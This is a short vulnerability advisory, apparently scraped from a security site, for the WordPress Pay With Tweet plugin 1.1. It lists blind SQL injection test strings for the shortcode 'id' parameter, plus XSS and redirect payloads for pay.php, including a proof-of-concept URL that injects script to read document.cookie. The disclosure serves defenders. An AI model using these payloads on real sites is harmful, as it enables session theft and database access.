标题: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities 作者: Gianluca Brindisi HdhCmsTest2cto测试数据 (gATbrindi.si @gbrindisi http://brindi.si/g/) 下载 地址: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip 影响版本: 1.1 1) Blind SQL Injection in shortcode: Short code parameter 'id' is prone to blind sqli, you need to be able to write a post/page to exploit this: [paywithtweet id="1' AND 1=2"] [paywithtweet id="1' AND 1=1"] 2) Multiple XSS in pay.php http://HdhCmsTest2cto测试数据 /wp-content/plugins/pay-with-tweet.php/pay.php After connecting to twitter: ?link=&22></input>[XSS] After submitting the tweet: ?title=[XSS]&dl=[REDIRECT-TO-URL]%27)">[XSS] The final download link will be replaced with [REDIRECT-TO-URL] POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"><script>alert(document.cookie)</script>
查看更多关于Wordpress插件Pay With Tweet <= 1.1多个缺陷及修复的详细内容...